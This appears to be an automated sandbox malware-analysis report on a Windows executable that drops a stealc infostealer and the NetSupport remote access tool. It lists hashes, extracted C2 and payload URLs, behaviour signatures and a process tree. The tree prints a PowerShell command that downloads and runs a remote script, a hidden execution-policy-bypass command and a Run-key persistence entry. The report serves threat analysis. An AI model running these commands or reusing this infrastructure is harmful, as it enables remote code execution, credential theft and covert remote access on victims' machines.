Analysis
max time kernel: 147s
max time network: 150s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 11/09/2024, 16:25
Behavioral task: behavioral1
Sample: b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Resource: win10v2004-20240802-en

Behavioral task: behavioral2
Sample: b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Resource: win11-20240802-en
General
Target: b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Size: 6.8MB
MD5: acb755d083c876f6a80105c17cc61754
SHA1: 8ccfc2b30402e76a59ed07873b0ccf589728fd22
SHA256: b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86
SHA512: 2d26da0b24c61e05a66583b548672f00b4351c87669fb8b7e4e71a73da4a2c0e470d7c6aa8072976fe8ca2ac5ea6b75e41f54b426c0d1de06aa118a83283b70b
SSDEEP: 196608:DzSpVt4hhiIbZg4T4hac7p6eDcGRY9Dc+/7/MS6a:DWp74hVbehacQeHwDc+/7zb
Malware Config

Extracted
https://www.et-ba.com.tr/temp/b64_akam_kent_2708.ps1

Extracted
https://calbyiris.com/fvz/f2v.zip
https://calbyiris.com/fvz/f1v.zip
https://calbyiris.com/fvz/f3v.zip
https://calbyiris.com/fvz/f4v.zip
https://calbyiris.com/fvf/

Extracted
stealc
Workbaza
http://5.35.36.211
url_path: /cadb6378d4b16104.php
Signatures

NetSupport
NetSupport is a remote access tool sold as legitimate system administration software.

Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
Malicious access to, or copying of, the web browser credential store.

Blocklisted process makes network request (1 IoCs)
flow | pid | Process
3 | 2420 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoCs)
pid | Process
4668 | client32.exe

Loads dropped DLL (13 IoCs)
pid | Process
2040 | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe (8 entries)
4668 | client32.exe (5 entries)

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Unsecured Credentials: Credentials In Files (1 TTPs)
Steals credentials from unsecured files.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\HDiskDefragm = "C:\\Users\\Admin\\AppData\\Roaming\\HDiskDefragm\\client32.exe" | powershell.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

pid | Process
2420 | powershell.exe
1604 | powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | client32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
pid | Process
2040 | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe (4 entries)
2420 | powershell.exe (2 entries)
1604 | powershell.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 2420 | powershell.exe
Token: SeDebugPrivilege | 1604 | powershell.exe
Token: SeSecurityPrivilege | 4668 | client32.exe

Suspicious use of FindShellTrayWindow (1 IoCs)
pid | Process
4668 | client32.exe

Suspicious use of WriteProcessMemory (12 IoCs)
description | pid | Process | procid_target
PID 5112 wrote to memory of 2040 | 5112 | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe | 79 (3 entries)
PID 2040 wrote to memory of 2420 | 2040 | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe | 80 (3 entries)
PID 2420 wrote to memory of 1604 | 2420 | powershell.exe | 82 (3 entries)
PID 1604 wrote to memory of 4668 | 1604 | powershell.exe | 84 (3 entries)
Processes

[1] C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"
    PID: 5112
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"
      PID: 2040
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('https://www.et-ba.com.tr/temp/b64_akam_kent_2708.ps1')"
        PID: 2420
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOPRofIlE -exEcUTiONpOlI bypASS -WinDOWST HiD -ec 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
          PID: 1604
          - Adds Run key to start application
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

        [5] C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe
            command line: "C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe"
            PID: 4668
            - Executes dropped EXE
            - Loads dropped DLL
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v15

Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)

Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (4)
    Credentials In Files (4)
Downloads

Filesize: 593KB
MD5: c8fd9be83bc728cc04beffafc2907fe9
SHA1: 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256: ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512: fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Filesize: 2.0MB
MD5: 1cc453cdf74f31e4d913ff9c10acdde2
SHA1: 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256: ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512: dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Filesize: 2KB
MD5: 4a86dfe2dff3994056e7f97854798f41
SHA1: 2c618b26008e3dc6607eff7e3fe2dca42376588c
SHA256: d667a9fc556be57850089669354c1cf86cab949d034808d202fb658561799010
SHA512: 3bb29aae3c8e6b478d561001d599891211608dd83c63b6937d7fb0bceb274fb7c29efb00b9999ad1d5f7625b9e3f1ae96ec87e07952a6a2b6bc324195833f382

Filesize: 16KB
MD5: d39fd39000d0f423e7f5b946e91ebd83
SHA1: 5934b4a4a5a3a09e41fda263d683559b3e2488f4
SHA256: 932c56b74c4488b19f136178efd2c7aaaf864778e55fa4343ba9d8e9837cca4a
SHA512: b0469ec2ad1fc09653b65efaf71a7ab21238f86982285f28549c9181ff4bff945d81c7f5269f8142836ffa51a2595c7f308e4cbf9fef59b4b14d3a00be7becdf

Filesize: 74KB
MD5: afa8fb684eded0d4ca6aa03aebea446f
SHA1: 98bbb8543d4b3fbecebb952037adb0f9869a63a5
SHA256: 44de8d0dc9994bff357344c44f12e8bfff8150442f7ca313298b98e6c23a588e
SHA512: 6669eec07269002c881467d4f4af82e5510928ea32ce79a7b1f51a71ba9567e8d99605c5bc86f940a7b70231d70638aeb2f6c2397ef197bd4c28f5e9fad40312

Filesize: 114KB
MD5: 21e301d58c481660af1efdebc4ad63fe
SHA1: ec10719afcbd6317355bbe0de04beb3d5c067651
SHA256: 003429b4e119dc08798aada64c13002b210507291afae8cace5eb0032754e78e
SHA512: fe06fcb3f6f3f76b7de0ea92ea4fb286c6f8643cbe0f34a9df9b354434aabe3941a3bf2028f3a2e61183f4c39ee2f80ec5dfdcd9854416423142142508a71493

Filesize: 69KB
MD5: 2df573607b053e4d8ba0eba9be96541c
SHA1: d41b40c468898c9a2e4d6be434c7eea57724b546
SHA256: a591d3054c741496889e1a427516d8aab89bb94636b96467213fa6449df9eb26
SHA512: 21fb191b49092abf5bc0ab029fdff0a63b7b77ed4edbf13b0c74eb8d3e5a9ebd5ba8314c0f8293ad5c922c5ad0849a23d1fa05e1c6e3104c23aab85dcd095e56

Filesize: 781KB
MD5: d214306a963d6db9dbe73c65d9b7c23e
SHA1: e42d3786f3ecf2cffee2ca2b7821973630431231
SHA256: 5dd6afe3439d4eb8673de441ed980825919110abc2b1360c7a02a3cc365fcca8
SHA512: 76601a39f1e84eaf3257a4989a45b6e2ee8492788239bb8f42729bfdbfbd3a50949295fd459ee4d9649fd16c3815740d7bf8152c4b707432a2a480ced711473c

Filesize: 28KB
MD5: bc20614744ebf4c2b8acd28d1fe54174
SHA1: 665c0acc404e13a69800fae94efd69a41bdda901
SHA256: 0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57
SHA512: 0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

Filesize: 4.3MB
MD5: 84741db3367d6998108d22e03eaf2a71
SHA1: 6564ab918223d0074dfbf9bc5d062fd3a2003079
SHA256: 3e0c22d1451c3f3578850990f54916eb276bb45b951649d6478523566dfa8059
SHA512: 1a6aa94ec97df73b23b0d5079bafa92c13f9786f5c488046e95804f4701baeecb1beb9fd96824a6009355321adb7319ac643af40ff0c6b01733050dab2b648c0

Filesize: 24KB
MD5: e2642d30be324bd86d711ada36797b85
SHA1: c474699a4853f0157708901213d3165530c45a69
SHA256: bb87be114067ab856067dbe74ba421c21cb0f36ad1960af0f5d61bda2e753fa2
SHA512: b2bb79f229d86e74d04bae5ef4813909afeaac530ce71f384c2ce1e1c690d792b413255c35e97b0ef9ff72c68d779dc044a03646d35777a40f1a427eafc14666

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 320KB
MD5: 2d3b207c8a48148296156e5725426c7f
SHA1: ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256: edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512: 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Filesize: 253B
MD5: 12b8cc1d0a34012bbbbe86880333c567
SHA1: e89659c412af82e31e6d14c34e47d7cc4c5ec9a5
SHA256: 9c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f
SHA512: eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc

Filesize: 3.5MB
MD5: d16ffa06a35601a73b73836bf905ed19
SHA1: b8231d36f921e5b75b592ea3374f19216a5c411f
SHA256: 80cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab
SHA512: e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168

Filesize: 33KB
MD5: 290c26b1579fd3e48d60181a2d22a287
SHA1: e4c91a7f161783c68cf67250206047f23bd25a29
SHA256: 973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128
SHA512: 114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

Filesize: 733B
MD5: 0cdedc9a0a1ee8c9f7ca140e543f2f1c
SHA1: 2540f9e3c63b6174a60324b137ffb5697c1a7df8
SHA256: 3e63adc8fd536f6045c8ffde42649350f13df7b7d2f7f988f4bfb0591bf9afb6
SHA512: 068deac28541fb62792f49a3e368ea9949e3dba93f6c23a942d28e0d9ae87e3bb25a878a9d777a2ec2dc4b918fc0a357f7ce7534c22c62128f2fe2a7c7a14ae2

Filesize: 755KB
MD5: 0e37fbfa79d349d672456923ec5fbbe3
SHA1: 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256: 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512: 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Filesize: 32KB
MD5: dcde2248d19c778a41aa165866dd52d0
SHA1: 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256: 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512: c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Filesize: 18KB
MD5: a0b9388c5f18e27266a31f8c5765b263
SHA1: 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256: 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512: 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd